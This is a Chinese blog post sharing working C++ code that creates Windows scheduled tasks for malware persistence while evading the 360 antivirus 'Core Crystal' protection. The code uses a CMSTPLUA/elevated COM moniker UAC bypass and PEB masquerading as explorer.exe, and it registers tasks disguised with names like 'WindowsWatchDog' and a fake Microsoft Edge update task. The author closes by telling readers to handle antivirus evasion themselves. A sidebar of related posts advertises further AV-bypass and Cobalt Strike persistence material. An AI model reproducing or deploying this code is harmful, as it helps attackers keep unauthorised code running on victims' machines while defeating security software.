计划任务绕过360核晶自启动 c++

最新推荐文章于 2024-04-14 09:10:42 发布
最新推荐文章于 2024-04-14 09:10:42 发布
阅读量3k 收藏 14
点赞数 2
分类专栏: 核晶 文章标签: c++ windows 开发语言 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37561898/article/details/131374060
版权

先看普通api创建计划任务

#define _WIN32_DCOM
#pragma comment(linker, "/SUBSYSTEM:windows /ENTRY:mainCRTStartup")


#include <windows.h>
#include <iostream>
#include <stdio.h>
#include <comdef.h>
#include <taskschd.h>
#include "tlhelp32.h"
#pragma comment(lib, "wininet.lib")
#pragma comment(lib, "taskschd.lib")
#pragma comment(lib, "comsupp.lib")

using namespace std;




int login(HANDLE han, LPWSTR filename)
{

    HRESULT hr = CoInitializeEx(NULL, COINIT_MULTITHREADED);

    hr = CoInitializeSecurity(
        NULL,
        -1,
        NULL,
        NULL,
        RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
        RPC_C_IMP_LEVEL_IMPERSONATE,
        NULL,
        0,
        NULL);

    string wszTaskName = "WindowsWatchDog";

    ITaskService* pService = NULL;
    hr = CoCreateInstance(CLSID_TaskScheduler,
        NULL,
        CLSCTX_INPROC_SERVER,
        IID_ITaskService,
        (void**)&pService);

    hr = pService->Connect(_variant_t(), _variant_t(),
        _variant_t(), _variant_t());

    ITaskFolder* pRootFolder = NULL;
    hr = pService->GetFolder(_bstr_t(L"\\"), &pRootFolder);

    pRootFolder->DeleteTask(_bstr_t(wszTaskName.c_str()), 0);

    ITaskDefinition* pTask = NULL;
    hr = pService->NewTask(0, &pTask);

    pService->Release();


    IRegistrationInfo* pRegInfo = NULL;
    hr = pTask->get_RegistrationInfo(&pRegInfo);

    hr = pRegInfo->put_Author(_bstr_t("Administrator"));
    pRegInfo->Release();

    ITaskSettings* pSettings = NULL;
    hr = pTask->get_Settings(&pSettings);

    hr = pSettings->put_StartWhenAvailable(VARIANT_TRUE);
    pSettings->Release();

    ITriggerCollection* pTriggerCollection = NULL;
    hr = pTask->get_Triggers(&pTriggerCollection);

    ITrigger* pTrigger = NULL;
    hr = pTriggerCollection->Create(TASK_TRIGGER_BOOT, &pTrigger);
    pTriggerCollection->Release();

    IBootTrigger* pBootTrigger = NULL;
    hr = pTrigger->QueryInterface(
        IID_IBootTrigger, (void**)&pBootTrigger);
    pTrigger->Release();

    hr = pBootTrigger->put_Id(_bstr_t(L"Trigger1"));

    hr = pBootTrigger->put_StartBoundary(_bstr_t(L"2005-01-01T12:05:00"));

    hr = pBootTrigger->put_EndBoundary(_bstr_t(L"2035-05-02T08:00:00"));

    hr = pBootTrigger->put_Delay(_bstr_t("PT10S"));
    pBootTrigger->Release();

    IActionCollection* pActionCollection = NULL;

    hr = pTask->get_Actions(&pActionCollection);

    IAction* pAction = NULL;
    hr = pActionCollection->Create(TASK_ACTION_EXEC, &pAction);
    pActionCollection->Release();

    IExecAction* pExecAction = NULL;
    hr = pAction->QueryInterface(
        IID_IExecAction, (void**)&pExecAction);
    pAction->Release();

    hr = pExecAction->put_Path(filename);
    pExecAction->Release();

    IRegisteredTask* pRegisteredTask = NULL;
    VARIANT varPassword;
    varPassword.vt = VT_EMPTY;
    hr = pRootFolder->RegisterTaskDefinition(
        _bstr_t(wszTaskName.c_str()),
        pTask,
        TASK_CREATE_OR_UPDATE,
        _variant_t(L"SYSTEM"),
        varPassword,
        TASK_LOGON_SERVICE_ACCOUNT,
        _variant_t(L""),
        &pRegisteredTask);
    if (FAILED(hr))
    {
        WriteConsole(han, L"\nError saving the Task", 23, new DWORD, 0);
        //printf("\nError saving the Task : %x", hr);
        pRootFolder->Release();
        pTask->Release();
        CoUninitialize();
        return 1;
    }

    WriteConsole(han, L"Success", 8, new DWORD, 0);

    pRootFolder->Release();
    pTask->Release();
    pRegisteredTask->Release();
    CoUninitialize();
    return 0;
}

int main()
{
   
    HANDLE han = GetStdHandle(STD_OUTPUT_HANDLE);
    WCHAR filenam[MAX_PATH];
    GetModuleFileNameW(NULL, filenam, MAX_PATH);
    login(han,filenam);
  

}

上面的创建计划任务可以在运行着大部分杀软的情况下创建计划任务维权。但是碰到360核晶会被提示拦截,下面是绕过核晶创建的代码,附带一段PEB提权

#define _CRT_SECURE_NO_WARNINGS
#include <Windows.h>

#include <iostream>
#include <Windows.h>
#include <taskschd.h>
#include <comdef.h>
#include <comutil.h>
#include <objbase.h>
#include <ntstatus.h>
#pragma comment(lib, "taskschd.lib")
#pragma comment(lib, "comsuppw.lib")
#include <sddl.h>
#include <Aclapi.h>
#pragma comment(lib, "ole32.lib")
#pragma comment(lib, "ntdll.lib")
#include <fstream>
#include <string>
#include <filesystem>
#include <cstdlib>







#define T_CLSID_CMSTPLUA                     L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
#define T_IID_ICMLuaUtil                     L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}"
#define T_ELEVATION_MONIKER_ADMIN            L"Elevation:Administrator!new:"

#define UCM_DEFINE_GUID(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \
     EXTERN_C const GUID DECLSPEC_SELECTANY name \
                = { l, w1, w2, { b1, b2,  b3,  b4,  b5,  b6,  b7,  b8 } }  

UCM_DEFINE_GUID(IID_ICMLuaUtil, 0x6EDD6D74, 0xC007, 0x4E75, 0xB7, 0x6A, 0xE5, 0x74, 0x09, 0x95, 0xE2, 0x4C);

typedef interface ICMLuaUtil ICMLuaUtil;

typedef struct ICMLuaUtilVtbl {

	BEGIN_INTERFACE

		HRESULT(STDMETHODCALLTYPE* QueryInterface)(
			__RPC__in ICMLuaUtil* This,
			__RPC__in REFIID riid,
			_COM_Outptr_  void** ppvObject);

	ULONG(STDMETHODCALLTYPE* AddRef)(
		__RPC__in ICMLuaUtil* This);

	ULONG(STDMETHODCALLTYPE* Release)(
		__RPC__in ICMLuaUtil* This);

	
	HRESULT(STDMETHODCALLTYPE* SetRasCredentials)(
		__RPC__in ICMLuaUtil* This);

	
	HRESULT(STDMETHODCALLTYPE* SetRasEntryProperties)(
		__RPC__in ICMLuaUtil* This);

	
	HRESULT(STDMETHODCALLTYPE* DeleteRasEntry)(
		__RPC__in ICMLuaUtil* This);

	
	HRESULT(STDMETHODCALLTYPE* LaunchInfSection)(
		__RPC__in ICMLuaUtil* This);

	
	HRESULT(STDMETHODCALLTYPE* LaunchInfSectionEx)(
		__RPC__in ICMLuaUtil* This);

	
	HRESULT(STDMETHODCALLTYPE* CreateLayerDirectory)(
		__RPC__in ICMLuaUtil* This);

	HRESULT(STDMETHODCALLTYPE* ShellExec)(
		__RPC__in ICMLuaUtil* This,
		_In_     LPCTSTR lpFile,
		_In_opt_  LPCTSTR lpParameters,
		_In_opt_  LPCTSTR lpDirectory,
		_In_      ULONG fMask,
		_In_      ULONG nShow);

	END_INTERFACE

} *PICMLuaUtilVtbl;

interface ICMLuaUtil { CONST_VTBL struct ICMLuaUtilVtbl* lpVtbl; };


HRESULT ucmAllocateElevatedObject(
	_In_ LPWSTR lpObjectCLSID,
	_In_ REFIID riid,
	_In_ DWORD dwClassContext,
	_Outptr_ void** ppv
)
{
	BOOL        bCond = FALSE;
	DWORD       classContext;
	HRESULT     hr = E_FAIL;
	PVOID       ElevatedObject = NULL;

	BIND_OPTS3  bop;
	WCHAR       szMoniker[MAX_PATH];

	do {

		if (wcslen(lpObjectCLSID) > 64)
			break;

		RtlSecureZeroMemory(&bop, sizeof(bop));
		bop.cbStruct = sizeof(bop);

		classContext = dwClassContext;
		if (dwClassContext == 0)
			classContext = CLSCTX_LOCAL_SERVER;

		bop.dwClassContext = classContext;

		wcscpy(szMoniker, T_ELEVATION_MONIKER_ADMIN);
		wcscat(szMoniker, lpObjectCLSID);

		hr = CoGetObject(szMoniker, (BIND_OPTS*)&bop, riid, &ElevatedObject);

	} while (bCond);

	*ppv = ElevatedObject;

	return hr;
}




NTSTATUS ucmCMLuaUtilShellExecMethod(
	_In_ LPWSTR lpszExecutable
)
{
	NTSTATUS         MethodResult = STATUS_ACCESS_DENIED;
	HRESULT          r = E_FAIL, hr_init;
	BOOL             bApprove = FALSE;
	ICMLuaUtil* CMLuaUtil = NULL;

	hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);

	do {

		r = ucmAllocateElevatedObject(
			LPWSTR(T_CLSID_CMSTPLUA),
			IID_ICMLuaUtil,
			CLSCTX_LOCAL_SERVER,
			(void**)&CMLuaUtil);

		if (r != S_OK)
			break;

		if (CMLuaUtil == NULL) {
			r = E_OUTOFMEMORY;
			break;
		}

		r = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil,
			lpszExecutable,
			NULL,
			NULL,
			SEE_MASK_DEFAULT,
			SW_SHOW);

		if (SUCCEEDED(r))
			MethodResult = STATUS_SUCCESS;

	} while (FALSE);

	if (CMLuaUtil != NULL) {
		CMLuaUtil->lpVtbl->Release(CMLuaUtil);
	}

	if (hr_init == S_OK)
		CoUninitialize();

	return MethodResult;
}

BOOL MasqueradePEB() {


	typedef struct _UNICODE_STRING {
		USHORT Length;
		USHORT MaximumLength;
		PWSTR  Buffer;
	} UNICODE_STRING, * PUNICODE_STRING;

	typedef NTSTATUS(NTAPI* _NtQueryInformationProcess)(
		HANDLE ProcessHandle,
		DWORD ProcessInformationClass,
		PVOID ProcessInformation,
		DWORD ProcessInformationLength,
		PDWORD ReturnLength
		);

	typedef NTSTATUS(NTAPI* _RtlEnterCriticalSection)(
		PRTL_CRITICAL_SECTION CriticalSection
		);

	typedef NTSTATUS(NTAPI* _RtlLeaveCriticalSection)(
		PRTL_CRITICAL_SECTION CriticalSection
		);

	typedef void (WINAPI* _RtlInitUnicodeString)(
		PUNICODE_STRING DestinationString,
		PCWSTR SourceString
		);

	typedef struct _LIST_ENTRY {
		struct _LIST_ENTRY* Flink;
		struct _LIST_ENTRY* Blink;
	} LIST_ENTRY, * PLIST_ENTRY;

	typedef struct _PROCESS_BASIC_INFORMATION
	{
		LONG ExitStatus;
		PVOID PebBaseAddress;
		ULONG_PTR AffinityMask;
		LONG BasePriority;
		ULONG_PTR UniqueProcessId;
		ULONG_PTR ParentProcessId;
	} PROCESS_BASIC_INFORMATION, * PPROCESS_BASIC_INFORMATION;

	typedef struct _PEB_LDR_DATA {
		ULONG Length;
		BOOLEAN Initialized;
		HANDLE SsHandle;
		LIST_ENTRY InLoadOrderModuleList;
		LIST_ENTRY InMemoryOrderModuleList;
		LIST_ENTRY InInitializationOrderModuleList;
		PVOID EntryInProgress;
		BOOLEAN ShutdownInProgress;
		HANDLE ShutdownThreadId;
	} PEB_LDR_DATA, * PPEB_LDR_DATA;

	typedef struct _RTL_USER_PROCESS_PARAMETERS {
		BYTE           Reserved1[16];
		PVOID          Reserved2[10];
		UNICODE_STRING ImagePathName;
		UNICODE_STRING CommandLine;
	} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;

	
	typedef struct _PEB {
		BOOLEAN InheritedAddressSpace;
		BOOLEAN ReadImageFileExecOptions;
		BOOLEAN BeingDebugged;
		union
		{
			BOOLEAN BitField;
			struct
			{
				BOOLEAN ImageUsesLargePages : 1;
				BOOLEAN IsProtectedProcess : 1;
				BOOLEAN IsLegacyProcess : 1;
				BOOLEAN IsImageDynamicallyRelocated : 1;
				BOOLEAN SkipPatchingUser32Forwarders : 1;
				BOOLEAN SpareBits : 3;
			};
		};
		HANDLE Mutant;

		PVOID ImageBaseAddress;
		PPEB_LDR_DATA Ldr;
		PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
		PVOID SubSystemData;
		PVOID ProcessHeap;
		PRTL_CRITICAL_SECTION FastPebLock;
	} PEB, * PPEB;

	typedef struct _LDR_DATA_TABLE_ENTRY {
		LIST_ENTRY InLoadOrderLinks;
		LIST_ENTRY InMemoryOrderLinks;
		union
		{
			LIST_ENTRY InInitializationOrderLinks;
			LIST_ENTRY InProgressLinks;
		};
		PVOID DllBase;
		PVOID EntryPoint;
		ULONG SizeOfImage;
		UNICODE_STRING FullDllName;
		UNICODE_STRING BaseDllName;
		ULONG Flags;
		WORD LoadCount;
		WORD TlsIndex;
		union
		{
			LIST_ENTRY HashLinks;
			struct
			{
				PVOID SectionPointer;
				ULONG CheckSum;
			};
		};
		union
		{
			ULONG TimeDateStamp;
			PVOID LoadedImports;
		};
	} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;

	DWORD dwPID;
	PROCESS_BASIC_INFORMATION pbi;
	PPEB peb;
	PPEB_LDR_DATA pld;
	PLDR_DATA_TABLE_ENTRY ldte;

	_NtQueryInformationProcess NtQueryInformationProcess = (_NtQueryInformationProcess)
		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQueryInformationProcess");
	if (NtQueryInformationProcess == NULL) {
		return FALSE;
	}

	_RtlEnterCriticalSection RtlEnterCriticalSection = (_RtlEnterCriticalSection)
		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlEnterCriticalSection");
	if (RtlEnterCriticalSection == NULL) {
		return FALSE;
	}

	_RtlLeaveCriticalSection RtlLeaveCriticalSection = (_RtlLeaveCriticalSection)
		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlLeaveCriticalSection");
	if (RtlLeaveCriticalSection == NULL) {
		return FALSE;
	}

	_RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)
		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlInitUnicodeString");
	if (RtlInitUnicodeString == NULL) {
		return FALSE;
	}

	dwPID = GetCurrentProcessId();
	HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, dwPID);
	if (hProcess == INVALID_HANDLE_VALUE)
	{
		return FALSE;
	}
	NtQueryInformationProcess(hProcess, 0, &pbi, sizeof(pbi), NULL);

	if (!ReadProcessMemory(hProcess, &pbi.PebBaseAddress, &peb, sizeof(peb), NULL)) {
		return FALSE;
	}

	if (!ReadProcessMemory(hProcess, &peb->Ldr, &pld, sizeof(pld), NULL)) {
		return FALSE;
	}


	WCHAR chExplorer[MAX_PATH + 1];
	GetWindowsDirectory(chExplorer, MAX_PATH);
	wcscat_s(chExplorer, sizeof(chExplorer) / sizeof(wchar_t), L"\\explorer.exe");

	LPWSTR pwExplorer = (LPWSTR)malloc(MAX_PATH);
	wcscpy_s(pwExplorer, MAX_PATH, chExplorer);


	RtlEnterCriticalSection(peb->FastPebLock);

	
	RtlInitUnicodeString(&peb->ProcessParameters->ImagePathName, pwExplorer);
	RtlInitUnicodeString(&peb->ProcessParameters->CommandLine, pwExplorer);


	WCHAR wFullDllName[MAX_PATH];
	WCHAR wExeFileName[MAX_PATH];
	GetModuleFileName(NULL, wExeFileName, MAX_PATH);

	LPVOID pStartModuleInfo = peb->Ldr->InLoadOrderModuleList.Flink;
	LPVOID pNextModuleInfo = pld->InLoadOrderModuleList.Flink;
	do
	{
	
		if (!ReadProcessMemory(hProcess, &pNextModuleInfo, &ldte, sizeof(ldte), NULL)) {
			return FALSE;
		}

	
		if (!ReadProcessMemory(hProcess, (LPVOID)ldte->FullDllName.Buffer, (LPVOID)&wFullDllName, ldte->FullDllName.MaximumLength, NULL))
		{
			return FALSE;
		}

		if (_wcsicmp(wExeFileName, wFullDllName) == 0) {
			RtlInitUnicodeString(&ldte->FullDllName, pwExplorer);
			RtlInitUnicodeString(&ldte->BaseDllName, pwExplorer);
			break;
		}

		pNextModuleInfo = ldte->InLoadOrderLinks.Flink;

	} while (pNextModuleInfo != pStartModuleInfo);


	RtlLeaveCriticalSection(peb->FastPebLock);


	CloseHandle(hProcess);

	if (_wcsicmp(chExplorer, wFullDllName) == 0) {
		return FALSE;
	}

	return TRUE;
}




std::wstring GetCurrentExecutablePath() {
	wchar_t buffer[MAX_PATH];
	GetModuleFileName(NULL, buffer, MAX_PATH);
	return std::wstring(buffer);
}

std::wstring GetTaskXml(const std::wstring& executablePath) {
	return L"<?xml version=\"1.0\" encoding=\"UTF-16\"?>\
<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\
  <Principals>\
    <Principal>\
      <RunLevel>HighestAvailable</RunLevel>\
    </Principal>\
  </Principals>\
  <Triggers>\
    <LogonTrigger>\
      <Enabled>true</Enabled>\
    </LogonTrigger>\
  </Triggers>\
  <Actions Context=\"Author\">\
    <Exec>\
      <Command>cmd</Command>\
      <Arguments>/c start """" " + executablePath + L"</Arguments>\
    </Exec>\
  </Actions>\
</Task>";
}

static const IID IID_IElevatedFactoryServer =
{ 0x804bd226, 0xaf47, 0x4d71, { 0xb4, 0x92, 0x44, 0x3a, 0x57, 0x61, 0x0b, 0x08 } };
interface IElevatedFactoryServer : public IUnknown {
	virtual HRESULT STDMETHODCALLTYPE ServerCreateElevatedObject(REFCLSID rclsid, REFIID riid, void** ppv) = 0;
};


bool IsProcessRunningAsAdmin() {
	HANDLE hToken = nullptr;
	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
		std::cout << "Failed to open process token: " << GetLastError() << std::endl;
		return false;
	}

	TOKEN_ELEVATION elevation;
	DWORD dwSize;
	if (!GetTokenInformation(hToken, TokenElevation, &elevation, sizeof(elevation), &dwSize)) {
		std::cout << "Failed to get token information: " << GetLastError() << std::endl;
		CloseHandle(hToken);
		return false;
	}

	CloseHandle(hToken);
	return elevation.TokenIsElevated != 0;
}




int task() {
	std::wstring currentExecutablePath = GetCurrentExecutablePath();
	std::wstring taskXml = GetTaskXml(currentExecutablePath);
	const wchar_t* TASK_XML = taskXml.c_str();

	if (!IsProcessRunningAsAdmin()) {
		MasqueradePEB();
	}

	HRESULT hr = CoInitializeEx(NULL, COINIT_MULTITHREADED);
	if (FAILED(hr)) {
		std::cerr << "CoInitializeEx failed: " << hr << std::endl;
		return 1;
	}

	try {
		CLSID clsidElevatedFactoryServer;
		hr = CLSIDFromString(L"{A6BFEA43-501F-456F-A845-983D3AD7B8F0}", &clsidElevatedFactoryServer);

		BIND_OPTS3 bo;
		memset(&bo, 0, sizeof(bo));
		bo.cbStruct = sizeof(bo);
		bo.dwClassContext = CLSCTX_LOCAL_SERVER;
		IElevatedFactoryServer* pElevatedFactoryServer = NULL;
		hr = CoGetObject(L"Elevation:Administrator!new:{A6BFEA43-501F-456F-A845-983D3AD7B8F0}", &bo, IID_IElevatedFactoryServer, (void**)&pElevatedFactoryServer);
		if (FAILED(hr)) {
			std::cerr << "CoGetObject failed: " << hr << std::endl;
			return 1;
		}

		ITaskService* pTaskService = NULL;
		CLSID clsidTaskService;
		hr = CLSIDFromString(L"{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}", &clsidTaskService);

		hr = pElevatedFactoryServer->ServerCreateElevatedObject(clsidTaskService, IID_ITaskService, (void**)&pTaskService);
		if (FAILED(hr)) {
			std::cerr << "ServerCreateElevatedObject failed: " << hr << std::endl;
			return 1;
		}

		hr = pTaskService->Connect(_variant_t(), _variant_t(), _variant_t(), _variant_t());
		if (FAILED(hr)) {
			std::cerr << "Connect failed: " << hr << std::endl;
			return 1;
		}

		ITaskFolder* pRootFolder = NULL;
		hr = pTaskService->GetFolder(_bstr_t(L"\\"), &pRootFolder);
		if (FAILED(hr)) {
			std::cerr << "GetFolder failed: " << hr << std::endl;
			return 1;
		}

		hr = pRootFolder->DeleteTask(_bstr_t(L"MicrosoftEdgeUpdateTaskMachine_NAME"), 0);
		if (SUCCEEDED(hr)) {
			std::cout << "Deleted existing task: MicrosoftEdgeUpdateTaskMachine_NAME" << std::endl;
		}

		IRegisteredTask* pRegisteredTask = NULL;
		hr = pRootFolder->RegisterTask(_bstr_t(L"MicrosoftEdgeUpdateTaskMachine_NAME"), _bstr_t(TASK_XML),
			TASK_CREATE_OR_UPDATE, _variant_t(), _variant_t(), TASK_LOGON_INTERACTIVE_TOKEN, _variant_t(L""),
			&pRegisteredTask);

		if (SUCCEEDED(hr)) {
			std::cout << "Registered new task: MicrosoftEdgeUpdateTaskMachine_NAME" << std::endl; pRegisteredTask->Release();
		}
		else { std::cerr << "Failed to register new task: MicrosoftEdgeUpdateTaskMachine_NAME" << std::endl; }


		pRootFolder->Release();
		pTaskService->Release();
		pElevatedFactoryServer->Release();

	}
	catch (const _com_error& e) {
		std::cerr << "Error: " << e.ErrorMessage() << std::endl;
	}

	CoUninitialize();
	return 0;
}






int main() {
	
	task();

}

代码已经被静态查杀,请自行处理免杀

冲不动了啊啊啊
关注
  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
绕过360安全卫士写自启动
weixin_34008933的博客
02-15 1981
绕过360安全卫士写自启动360安全卫士是通过轮询比较当前自启动项与先前保存的自启动项的差别来检测自启动项的增加的,一段的方法绕过它可能不是那么容易。 下面贴段代码,可以绕过360安全卫士写自启动项。 源程序: #include "stdafx.h" #include <windows.h> int _tmain(int arg...
360自启动代码(最新测试)
07-13
这是一个可以过360的代码例子 大家可以下载下来看看
Windows编程-提升进程权限,以管理权限启动另一个程序
NINE_world的博客
10-04 1266
#include <iostream> #include <windows.h> #include <tchar.h> using namespace std; //提高自己的权限 /* * 这个函数,将进程权限提升成具有调试权限的进程,这个权限应该是进程所能具有的最大权限 * 前提启动这个进程的账户必须是一个管理员,否则没法提升 */ //当fEnable = TRUE 的时候,授予当前进程调试权限 //当fEnable = FALSE 的时候,收回调试权限 //
【网络安全】简单的免杀方法(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
04-14 1664
目录一、免杀的概念二、免杀系统搭建三、免杀工具介绍1、myccl2、C32asm3、OD4、LordPE5、ImportREC6、VC++6.0/visual studio7、数字签名四、关于杀软排名不分前后1、360。2、金山毒霸3、江民4、瑞星5、安天防线6、卡巴斯基7、NOD328、诺顿9、小红伞,木伞10、BD五、杀软的查杀方法1、最基础的查杀2.1、静态启发式2.2、动态启发式3、HIPS4、云安全六、免杀方面的术语1、API2、花指令3、输入表4、区段5、加壳6、反启发7、隐藏输入表什么是免杀?
最新免杀!可过360核晶与Defender(SysWhispers3)
潇湘信安的博客
05-19 1418
SysWhispers3WinHttp 基于SysWhispers3项目增添WinHttp分离加载功能,目前还可免杀绕过360核晶与Defender。
Mimikatz免杀实战:绕过360核晶和defender
xf555er的博客
08-22 2777
通常来说,即使我们成功实现了mimikatz的静态免杀,其抓取hash的行为仍可能会被防病毒软件检测到虽然你可以通过修改mimikatz的源码来实现行为上的免杀,但这需要花费大量的时间。我建议针对具体功能的代码来实现免杀,例如,mimikatz的dump hash功能主要依赖于Windows API的Minidump函数。
利用Windows的启动机制实现拦截360的运行
AnnieLin1990的博客
09-20 250
今天无意中发现一个漏洞,可以轻松干掉360,就是利用Windows的启动机制实现拦截360的运行。Windows中有一个叫做软件限制策略的功能,可以用来限制应用程序的运行,和IFEO比较像,只不过IFEO早已过时,而且被360彻底封杀掉了,而windows的进程启动限制机制360倒没有注意到。于是,直接写一个限制360启动的规则加入注册表,这样360就再也无法启动了,这下360终于不牛B...
编写绕过360安全卫士自启动项 - 黑白网络
04-12
编写绕过360安全卫士自启动项 - 黑白网络
任务计划开机自启C++
01-01
标题中的“任务计划开机自启C++”是指利用C++编程语言来创建一个程序,该程序能够在计算机开机时自动启动。这通常涉及到Windows操作系统中的任务计划程序服务,它允许用户安排程序在特定时间或系统事件(如开机)时...
完整版开机自启动模块 360无提示.rar
04-02
一些恶意软件会尝试绕过安全软件的检测,悄无声息地加入开机自启动,以保持持久性。因此,用户应该定期检查自启动项,确保没有未经授权的程序在启动时运行。 6. **安全风险**: - 开机自启动模块虽然方便,但也...
原生c++自实现定时任务引擎
06-01
c++简易定时任务引擎,原理简单,接口使用简单,通用。 支持指定任务执行次数。 包含使用示例。 启动定时器引擎Start(); 停止定时器引擎bool Stop(); 添加定时器( 不同的回调里面不用考虑dwTimerID重复的问题 )bool ...
启动项强制过360提示GHOST源码8月26日
09-04
C++源码 启动项过360提示 C++源码 启动项过360提示 C++源码 启动项过360提示
C++开机自启动代码
07-10
C++开机自启动代码,对初学者很有帮助的。试试吧。
c++ 写注册表方式让程序开机自启动
08-29
主要介绍了c++ 写注册表方式让程序开机自启动,需要的朋友可以参考下
Visual C++源代码 20 如何创建开机自启动程序
06-18
Visual C++源代码 20 如何创建开机自启动程序Visual C++源代码 20 如何创建开机自启动程序Visual C++源代码 20 如何创建开机自启动程序Visual C++源代码 20 如何创建开机自启动程序Visual C++源代码 20 如何创建开机...
用C语言将 cobalt strike的木马,写入启动项
weixin_50985113的博客
04-17 568
用C语言将 cobalt strike的木马,写入启动项 这是一项小测试,他并不能绕过杀软(写入启动项的时候杀软会拦截) 也不能正确的回连,在使用“powershell”回连的时候杀软也会拦截。 这只是本地测试,请勿用于非法用途,如果发生法律问题,与作者无关! #define _CRT_SECURE_NO_WARNINGS #include <windows.h> #include <stdio.h> #include<string.h> #pragma commen
白加黑过360启动项工具源码发布 多文件过启动项代码
YoseZang的博客
01-05 2837
360启动项发布多文件过启动项的代码 功能介绍 用于过360的多文件启动项,功能为Dll输出表的复制。 使用方法 要求原始文件的Dll输出表长度小于目标文件的此长度。 输出文件名为Cpy_目标文件名。 注意事项 此程序容易造成恶意后果,仅供研究用途,请勿将本软件用于任何违反道德及法律的用途。 下载地址 链接:https://pan.baidu.com/s/1bgvi9fChoFKOLbbskmcxKw 提取码:pjwx 复制这段内容后打开百度网盘手机A
360拦截exe安装,开机启动项
bornonew的博客
05-22 3408
最近对exe进行打包安装,发现总是被360弹框拦截,很不友好。最后解决方案如下:1.打包时,将开机启动做成可选项,供用户选择。2.对打包文件和exe文件进行数字签名3.将安装包提交到http://open.soft.360.cn 进行检测。另 360拦截与如何实现开机启动方式并没有太大的关系,以下几种方式都会被360拦截。1.从注册表中增加开机启动项SOFTWARE\Microsoft\Windo...
360 kill android,过核晶模式KILL360全套程序
weixin_35555014的博客
05-28 1606
这是18年在360安全响应中心发布的“kill核晶防护下360全套程序”漏洞,奖励了1K,时隔2年,留个纪念。一、详细说明在核晶防护下的360基本任何RING3下的程序都无法K掉,即使有,也会被拦截。但可通过运行伪造虚拟机白文件暂时关闭360核晶防护,再调用POSTTHREADMESSAGE对360产品每条线程发送WM_QUIT,使其强制关闭。注:当然在没有核晶防护的情况下,消息攻击可直接K掉,所...
c++ 设置进程管理员权限自启动并且过UAC
05-26
要实现C++程序在启动时获取管理员权限并且避免UAC提示框的出现,可以通过以下步骤: 1. 在程序代码中添加以下代码,以提升程序的权限: ```c++ BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege) { TOKEN_PRIVILEGES tp; LUID luid; if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid)) { return FALSE; } tp.PrivilegeCount = 1; tp.Privileges[0].Luid = luid; tp.Privileges[0].Attributes = bEnablePrivilege ? SE_PRIVILEGE_ENABLED : 0; if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) { return FALSE; } return (GetLastError() == ERROR_SUCCESS); } void SetAdministratorPrivilege() { HANDLE hToken; OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken); SetPrivilege(hToken, SE_DEBUG_NAME, TRUE); CloseHandle(hToken); } ``` 此代码片段使用Windows API函数 `OpenProcessToken` 和 `AdjustTokenPrivileges` 获取并提升程序的权限。请注意,此代码片段假定您的帐户已具有管理权限。 2. 将以下代码添加到程序的主函数中,以检查程序是否以管理员身份运行。如果不是,则使用管理员权限重新运行程序: ```c++ BOOL IsRunAsAdministrator() { BOOL fIsRunAsAdmin = FALSE; DWORD dwError = ERROR_SUCCESS; PSID pAdministratorsGroup = NULL; SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY; if (!AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &pAdministratorsGroup)) { dwError = GetLastError(); goto Cleanup; } if (!CheckTokenMembership(NULL, pAdministratorsGroup, &fIsRunAsAdmin)) { dwError = GetLastError(); goto Cleanup; } Cleanup: if (pAdministratorsGroup) { FreeSid(pAdministratorsGroup); pAdministratorsGroup = NULL; } SetLastError(dwError); return fIsRunAsAdmin; } int main() { if (!IsRunAsAdministrator()) { SHELLEXECUTEINFO sei = { sizeof(sei) }; sei.lpVerb = TEXT("runas"); sei.lpFile = TEXT("yourprogram.exe"); sei.nShow = SW_NORMAL; if (!ShellExecuteEx(&sei)) { return GetLastError(); } return 0; } SetAdministratorPrivilege(); // your program code here return 0; } ``` 此代码片段检查程序是否以管理员身份运行。如果不是,它使用 `ShellExecuteEx` 函数以管理员权限重新启动程序。通过此方法重新启动程序会自动获取管理员权限,并且不会出现UAC提示框。 请注意,此方法不能保证在所有Windows版本上都有效。在某些情况下,用户可能需要手动启动程序并选择“以管理员身份运行”。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值